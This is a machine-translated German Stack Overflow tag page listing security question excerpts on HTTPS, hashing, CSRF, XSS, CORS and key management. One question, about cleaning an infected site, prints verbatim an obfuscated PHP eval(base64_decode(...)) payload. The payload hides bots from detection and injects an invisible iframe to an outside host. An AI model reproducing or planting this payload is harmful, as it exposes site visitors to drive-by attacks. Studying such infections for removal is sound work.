Tag: security

Themen im Zusammenhang mit der Anwendung Sicherheit und die Angriffe gegen die software. Bitte verwenden Sie nicht dieser tag allein, dass die Ergebnisse in Zweifel.
Wenn Ihre Frage ist nicht eine spezifische Programmierung problem, denken Sie bitte, stattdessen zu Fragen, es bei der Information Security SE: https://security.stackexchange.com

Sind Querystring-Parameter in HTTPS (HTTP + SSL) sicher?

Anzahl der Antworten 4 Antworten
Tun querystring-Parameter erhalten verschlüsselten HTTPS, wenn Sie mit einer Anforderung gesendet? Kommentar zu dem Problem - Öffnen Duplikat von stackoverflow.com/questions/893959/... Kommentarautor: Michael Freidgeim mögliche Duplikate von eine HTTPS-query-string sicher? Kommentarautor: andand securityweek.com/hackers-can-intercept-https-urls-proxy-attacks Kommentarautor: Tom InformationsquelleAutor der Frage

Wie verschlüsseln / entschlüsseln Daten in PHP?

Anzahl der Antworten 6 Antworten
Ich bin zurzeit ein student und ich studiere in PHP, den ich versuche zu machen, eine einfache ver - /entschlüsseln von Daten in PHP. Ich habe einige online-Forschung und einige von Ihnen waren ziemlich verwirrend(zumindest für mich).

Unterschied zwischen SSL & amp; TLS

Anzahl der Antworten 6 Antworten
Laut wikipedia: http://en.wikipedia.org/wiki/Transport_Layer_Security Scheint, wie TLS ist ein Nachfolger von SSL, aber die meisten websites sind immer noch mit SSL? Kommentar zu dem Problem "die meisten websites sind immer noch mit SSL". Hier ist eine gute Umfrage-Protokoll-Unterstützung

CSS-Injektion: Was ist das Schlimmste, was passieren kann?

Anzahl der Antworten 2 Antworten
Machen wir einen security evaluation. Gibt es eine chance, dass ein böswilliger Benutzer injiziert werden können beliebige CSS in andere web-Seiten, obwohl wir sind nicht sicher, es kann tatsächlich ausgenutzt werden. Ich verstehen, er könne sich gänzlich

Wie melde ich mich mit einem IAM-Benutzerkonto bei AWS Console an?

Anzahl der Antworten 3 Antworten
Ich erstellt habe, ein IAM-Benutzerkonto. Jetzt will ich eine Verbindung mit diesem Benutzer an die AWS-Konsole. AWS sagt: For Users who need access to the AWS Management Console, create a password in the Users panel after completing

Welchen Vorteil hat der TCP-Zeitstempel?

Anzahl der Antworten 5 Antworten
Habe ich einen Sicherheits-scan zu finden Regie mich zu deaktivieren, TCP-timestamps. Ich verstehe die Gründe für die Empfehlung: die Zeitstempel können verwendet werden, um zu berechnen, server-uptime, was sehr hilfreich sein kann, um einem Angreifer (gute Erklärung

Warum gibt Google während (1) vor? zu ihren JSON Antworten?

Anzahl der Antworten 6 Antworten
Warum funktioniert Google voranstellen while(1); zu Ihrer (privaten) JSON Antworten? Zum Beispiel, hier ist eine Antwort, während Sie einen Kalender auf und ab in Google Kalender: while(1);[['u',[['smsSentFlag','false'],['hideInvitations','false'], ['remindOnRespondedEventsOnly','true'], ['hideInvitations_remindOnRespondedEventsOnly','false_true'], ['Calendar ID stripped for privacy','false'],['smsVerifiedFlag','true']]]] Ich würde annehmen,

Wie entferne ich das Passwort aus einem VBA-Projekt?

Anzahl der Antworten 4 Antworten
Wie kann ich programmgesteuert entfernen eines (bekannten) Passwort aus einer Excel-VBA-Projekt? Klar zu sein: ich habe das Passwort entfernen möchten, aus dem VBA-Projekt, nicht die Arbeitsmappe oder Arbeitsblätter. Kommentar zu dem Problem - Öffnen Habe einige googeln

Google Authenticator als öffentlicher Dienst verfügbar?

Anzahl der Antworten 9 Antworten
Gibt es eine öffentliche API für die Verwendung des Google Authenticator (zwei-Faktor-Authentifizierung) auf sich selbst ausführen (z.B. LAMP-stack) web-apps? InformationsquelleAutor der Frage ohho | 2011-02-23

Wie eval-base64_decode wie PHP-Virus-Dateien loswerden?

Anzahl der Antworten 6 Antworten
Meine Website (sehr große community-Webseite) wurde vor kurzem mit einem virus infiziert. Jeder index.php - Datei wurde so geändert, dass der öffnende php-tag dieser Dateien wurde geändert, um die folgende Zeile: <?php eval(base64_decode('ZXJyb3JfcmVwb3J0aW5nKDApOw0KJGJvdCA9IEZBTFNFIDsNCiR1c2VyX2FnZW50X3RvX2ZpbHRlciA9IGFycmF5KCdib3QnLCdzcGlkZXInLCdzcHlkZXInLCdjcmF3bCcsJ3ZhbGlkYXRvcicsJ3NsdXJwJywnZG9jb21vJywneWFuZGV4JywnbWFpbC5ydScsJ2FsZXhhLmNvbScsJ3Bvc3RyYW5rLmNvbScsJ2h0bWxkb2MnLCd3ZWJjb2xsYWdlJywnYmxvZ3B1bHNlLmNvbScsJ2Fub255bW91c2Uub3JnJywnMTIzNDUnLCdodHRwY2xpZW50JywnYnV6enRyYWNrZXIuY29tJywnc25vb3B5JywnZmVlZHRvb2xzJywnYXJpYW5uYS5saWJlcm8uaXQnLCdpbnRlcm5ldHNlZXIuY29tJywnb3BlbmFjb29uLmRlJywncnJycnJycnJyJywnbWFnZW50JywnZG93bmxvYWQgbWFzdGVyJywnZHJ1cGFsLm9yZycsJ3ZsYyBtZWRpYSBwbGF5ZXInLCd2dnJraW1zanV3bHkgbDN1Zm1qcngnLCdzem4taW1hZ2UtcmVzaXplcicsJ2JkYnJhbmRwcm90ZWN0LmNvbScsJ3dvcmRwcmVzcycsJ3Jzc3JlYWRlcicsJ215YmxvZ2xvZyBhcGknKTsNCiRzdG9wX2lwc19tYXNrcyA9IGFycmF5KA0KCWFycmF5KCIyMTYuMjM5LjMyLjAiLCIyMTYuMjM5LjYzLjI1NSIpLA0KCWFycmF5KCI2NC42OC44MC4wIiAgLCI2NC42OC44Ny4yNTUiICApLA0KCWFycmF5KCI2Ni4xMDIuMC4wIiwgICI2Ni4xMDIuMTUuMjU1IiksDQoJYXJyYXkoIjY0LjIzMy4xNjAuMCIsIjY0LjIzMy4xOTEuMjU1IiksDQoJYXJyYXkoIjY2LjI0OS42NC4wIiwgIjY2LjI0OS45NS4yNTUiKSwNCglhcnJheSgiNzIuMTQuMTkyLjAiLCAiNzIuMTQuMjU1LjI1NSIpLA0KCWFycmF5KCIyMDkuODUuMTI4LjAiLCIyMDkuODUuMjU1LjI1NSIpLA0KCWFycmF5KCIxOTguMTA4LjEwMC4xOTIiLCIxOTguMTA4LjEwMC4yMDciKSwNCglhcnJheSgiMTczLjE5NC4wLjAiLCIxNzMuMTk0LjI1NS4yNTUiKSwNCglhcnJheSgiMjE2LjMzLjIyOS4xNDQiLCIyMTYuMzMuMjI5LjE1MSIpLA0KCWFycmF5KCIyMTYuMzMuMjI5LjE2MCIsIjIxNi4zMy4yMjkuMTY3IiksDQoJYXJyYXkoIjIwOS4xODUuMTA4LjEyOCIsIjIwOS4xODUuMTA4LjI1NSIpLA0KCWFycmF5KCIyMTYuMTA5Ljc1LjgwIiwiMjE2LjEwOS43NS45NSIpLA0KCWFycmF5KCI2NC42OC44OC4wIiwiNjQuNjguOTUuMjU1IiksDQoJYXJyYXkoIjY0LjY4LjY0LjY0IiwiNjQuNjguNjQuMTI3IiksDQoJYXJyYXkoIjY0LjQxLjIyMS4xOTIiLCI2NC40MS4yMjEuMjA3IiksDQoJYXJyYXkoIjc0LjEyNS4wLjAiLCI3NC4xMjUuMjU1LjI1NSIpLA0KCWFycmF5KCI2NS41Mi4wLjAiLCI2NS41NS4yNTUuMjU1IiksDQoJYXJyYXkoIjc0LjYuMC4wIiwiNzQuNi4yNTUuMjU1IiksDQoJYXJyYXkoIjY3LjE5NS4wLjAiLCI2Ny4xOTUuMjU1LjI1NSIpLA0KCWFycmF5KCI3Mi4zMC4wLjAiLCI3Mi4zMC4yNTUuMjU1IiksDQoJYXJyYXkoIjM4LjAuMC4wIiwiMzguMjU1LjI1NS4yNTUiKQ0KCSk7DQokbXlfaXAybG9uZyA9IHNwcmludGYoIiV1IixpcDJsb25nKCRfU0VSVkVSWydSRU1PVEVfQUREUiddKSk7DQpmb3JlYWNoICggJHN0b3BfaXBzX21hc2tzIGFzICRJUHMgKSB7DQoJJGZpcnN0X2Q9c3ByaW50ZigiJXUiLGlwMmxvbmcoJElQc1swXSkpOyAkc2Vjb25kX2Q9c3ByaW50ZigiJXUiLGlwMmxvbmcoJElQc1sxXSkpOw0KCWlmICgkbXlfaXAybG9uZyA+PSAkZmlyc3RfZCAmJiAkbXlfaXAybG9uZyA8PSAkc2Vjb25kX2QpIHskYm90ID0gVFJVRTsgYnJlYWs7fQ0KfQ0KZm9yZWFjaCAoJHVzZXJfYWdlbnRfdG9fZmlsdGVyIGFzICRib3Rfc2lnbil7DQoJaWYgIChzdHJwb3MoJF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddLCAkYm90X3NpZ24pICE9PSBmYWxzZSl7JGJvdCA9IHRydWU7IGJyZWFrO30NCn0NCmlmICghJGJvdCkgew0KZWNobyAnPGRpdiBzdHlsZT0icG9zaXRpb246IGFic29sdXRlOyBsZWZ0OiAtMTk5OXB4OyB0b3A6IC0yOTk5cHg7Ij48aWZyYW1lIHNyYz0iaHR0cDovL2x6cXFhcmtsLmNvLmNjL1FRa0ZCd1FHRFFNR0J3WUFFa2NKQlFjRUFBY0RBQU1CQnc9PSIgd2lkdGg9IjIiIGhlaWdodD0iMiI+PC9pZnJhbWU+PC9kaXY+JzsNCn0=')); Wenn ich entschlüsselt diesen,

Ermöglicht HTML5 die Interaktion mit lokalen Clientdateien in einem Browser

Anzahl der Antworten 3 Antworten
Ich habe gesehen, wie einige Beiträge in Bezug auf den Zugang zu Dateien auf einem client-Computer von einer Webseite, nämlich diese Frage. Ich versuche zu hüpfen auf die "kontinuierlich zu aktualisieren, die in der cloud" - Paradigma

Wie kann ich die Änderung der Firebase-Daten einschränken?

Anzahl der Antworten 3 Antworten
Firebase bietet Datenbank-back-end, so dass Entwickler können sich auf der client-Seite code. Also, wenn jemand mein FB-uri (zum Beispielhttps://firebaseinstance.firebaseio.com), dann entwickeln die es lokal. Dann würden Sie in der Lage, erstellen Sie eine andere app aus meinem

Java und SSL - java.security.NoSuchAlgorithmException

Anzahl der Antworten 1 Antworten
Habe ich gebaut, ein Java-Programm als Frontend für eine Datenbank auf einem server, und ich versuche, verwenden Sie SSL zum verschlüsseln des Datenverkehrs zwischen den clients und dem server. Hier ist der Befehl, den ich erteilt, den

Session-Hijacking verhindern

Anzahl der Antworten 8 Antworten
Wie wollen Sie verhindern, dass mehrere clients mit den gleichen session-ID? Ich Frage das, weil ich will, um eine zusätzliche Ebene der Sicherheit, um zu verhindern, dass session-hijacking-Angriffe auf meine website. Wenn ein hacker irgendwie die zahlen

Wie kann ich den DDoS-Schutz aktivieren?

Anzahl der Antworten 10 Antworten
DDoS (Distributed Denial-of-Service-Attacken) sind in der Regel gesperrt auf einem server level Recht? Gibt es eine Möglichkeit, ihn zu blockieren, auf ein PHP-Ebene, oder zumindest reduzieren? Wenn nicht, was ist der Schnellste und häufigste Weg, Sie zu

Ein führender ../ kann nicht verwendet werden, um über das oberste Verzeichnis hinauszugehen

Anzahl der Antworten 8 Antworten
Habe ich eine asp.net Website mit ihm haben wir admin-Bereich mit login-Seite für den admin nur und alle Website ist für alle - ich muss Fragen, wie definieren Sie Sicherheit die richtige Konfiguration für es so ich

Wie man richtiges privates Schlüsselmanagement durchführt

Anzahl der Antworten 2 Antworten
Hat jemand praktische Erfahrung oder einen Hinweis für eine Regelung, die eine key-management-Schema, das die Einhaltung der PCI-DSS security standard? Gibt es offensichtlich schon ein paar Implementierungen gegeben, die Zahl der Unternehmen konform mit PCI DSS, sondern

Sollte ich das Passwort Hash vor dem Senden an die Server-Seite?

Anzahl der Antworten 11 Antworten
Bemerkte ich, dass die meisten Websites senden Sie die Kennwörter als Klartext über HTTPS an den server. Ist es von Vorteil, wenn statt dessen schickte ich den hash des Passwortes an den server? Wäre es sicherer? Kommentar

Warum ist die Verwendung eines Non-Random IV mit CBC-Modus eine Sicherheitslücke?

Anzahl der Antworten 3 Antworten
Verstehe ich den Sinn und Zweck einer IV. Speziell im CBC-Modus dadurch wird sichergestellt, dass Sie den ersten block von 2 Nachrichten mit dem gleichen Schlüssel verschlüsselt wird nie identisch sein. Aber warum ist es eine Schwachstelle,

Zahlungsprozessoren - Was muss ich wissen, wenn ich Kreditkarten auf meiner Website akzeptieren möchte?

Anzahl der Antworten 9 Antworten
Diese Frage Gespräche über verschiedene Zahlungsdienste und was Sie Kosten, aber ich bin auf der Suche nach der Antwort, was muss ich tun, wenn ich will, zu akzeptieren Zahlungen per Kreditkarte? Nehme an, ich muss store Kreditkarte

Wie sollte ein Facebook-Benutzerzugriffstoken auf der Serverseite konsumiert werden?

Anzahl der Antworten 2 Antworten
Vorwort Bin ich die Entwicklung mehrerer web-services und eine Handvoll clients (web-app, mobile, etc.) die Schnittstelle mit Sprach-Dienste über HTTP(s). Meine aktuelle Arbeitselement ist der Entwurf einer Authentifizierungs-und Autorisierungs-Lösung für das Produkt. Ich habe beschlossen, das zu

OAuth-Geheimnisse in mobilen Apps

Anzahl der Antworten 13 Antworten
Wenn mit dem OAuth-Protokoll, müssen Sie eine geheime Zeichenfolge erhalten Sie von der service, den Sie delegieren möchten. Wenn Sie dies tun in einer web-app, können Sie einfach speichern Sie das Geheimnis in Ihrer Datenbank oder auf

Sicherheitsimplikationen beim Hinzufügen aller Domänen zu CORS (Access-Control-Allow-Origin: *)

Anzahl der Antworten 6 Antworten
Es wird gesagt, dass statt der addition aller domains zu CORS, man sollte nur hinzufügen, eine Reihe von domains. Dennoch ist es manchmal nicht einfach ist, fügen Sie eine Reihe von domains. E. g. wenn ich will,

verschlüsseln und entschlüsseln md5

Anzahl der Antworten 5 Antworten
Bin ich mit dem code $enrypt=md5($pass) und einfügen $encrypt Datenbank. Ich möchte herausfinden, einen Weg, Sie zu entschlüsseln. Ich habe versucht, über einen Entschlüsselungs-software, aber es sagt, dass der Hashwert sollte von genau 16 bytes. gibt es

Chrome blockiert jetzt alle JSON-Anfragen von https zu http?

Anzahl der Antworten 2 Antworten
Irgendwann vor kurzem Chrome hat aufgehört, Daten laden per jsonp mit dem Fehler [blockiert] Die Seite https://user.example.com/category/12345 lief unsichere Inhalte aus http://livedata.example.com/Data.svc/jsonp/GetData?category=12345&callback=_jsp&_1346417951424=. Es funktioniert immer noch gut auf alle anderen Browser, und es wurde bestätigt, auf mehreren

verhindern csrf in php

Anzahl der Antworten 3 Antworten
Die eine Authentifizierung erfordern, in der GET-und POST-Parameter, nicht nur cookies; Überprüfung der HTTP-Referer-header; sah diesen Beitrag auf wikipedia und Frage mich, wie kann ich Sie anwenden ok...ich verwende das Kohana PHP-framework und ich habe die Anlage,

XSS-Angriff, um die Funktion htmlspecialchars () im value-Attribut zu umgehen

Anzahl der Antworten 3 Antworten
Sagen wir, wir haben diese form, und die möglichen Teil für einen Benutzer zu injizieren Schadcode in das unten ... <input type=text name=username value= <?php echo htmlspecialchars($_POST['username']); ?>> ... Können wir nicht einfach einen tag oder ein

Was macht Dollarzeichen in URL?

Anzahl der Antworten 2 Antworten
Habe ich gelesen, dass $ ! ; . , sind 'reserviert' Zeichen in der url. Aber ich kann nicht finden, was Sie reserviert. /path delimiter : port ? query & glue get params = param=val \# link

Wie man SAML SSO implementiert

Anzahl der Antworten 3 Antworten
Wie werden SAML-SSO-Regel umgesetzt? Habe ich gelesen diese (n.b. veraltet) über die Verwendung von SAML mit Apps von Google und der wikipedia-Eintrag über SAML. Den wikipedia-Eintrag spricht zum Umgang mit Formularen mit Angaben zu den SAMLRequest und

Wie kann verhindert werden, dass Ihr JavaScript-Code gestohlen, kopiert und angezeigt wird?

Anzahl der Antworten 10 Antworten
Ich weiß, das ist unmöglich für 100% Schutz, aber etwas hoch oder, das funktioniert für die Mehrheit der Nutzer. Beispielsweise, stieß ich auf eine Seite, wo die Anzeige der aktuellen Seite Quelle zurückgegeben wird nichts. In einem

Ist es sicher, von einem HTTP-Formular an HTTPS zu senden?

Anzahl der Antworten 11 Antworten
Ist es akzeptabel, reichen von einem http-Formular über https? Es scheint, wie es sollte sicher sein, aber es ermöglicht eine " man in the middle Angriff (hier ist eine gute Diskussion). Es gibt Seiten wie mint.com, die

Verwenden von Apache httpclient für https

Anzahl der Antworten 4 Antworten
Habe ich aktiviert https tomcat und haben ein selbst-signiertes Zertifikat für den server-auth. Erstellt habe ich einen http-client mit Apache httpClient. Ich habe eine trust-manager laden Sie das server-Zertifikat. Der http-client kann eine Verbindung mit dem server

AWS Lambda: Wie speichert man eine geheime externe API?

Anzahl der Antworten 5 Antworten
Baue ich ein monitoring-tool auf der Basis von AWS Lambda. Gegeben sei eine Menge von Metriken, die Lambdas sollten in der Lage sein, um SMS zu senden mit Twilio API. Um in der Lage sein, die API

Sperren Sie das Microsoft Excel-Makro

Anzahl der Antworten 6 Antworten
Habe ich verbrachte einige Zeit mit dem schreiben eines Excel-Makros, die möglicherweise bares Geld Wert, um eine Menge von Unternehmen. Wie kann ich das sperren, das makro zu verhindern, dass Menschen zu sehen, die Quelle /Weiterleitung zu

Zulassen, dass Java ein nicht vertrauenswürdiges Zertifikat für die SSL / HTTPS-Verbindung verwendet

Anzahl der Antworten 3 Antworten
Ich habe ein Programm zum extrahieren von Informationen aus einer dynamischen web-Anwendung, und das Programm funktionierte gut, bis ich meine tomcat-server zur Verwendung von SSL mit Hilfe eines selbst-signierten(also nicht vertrauenswürdig) - Zertifikat. Der stack-trace des Fehlers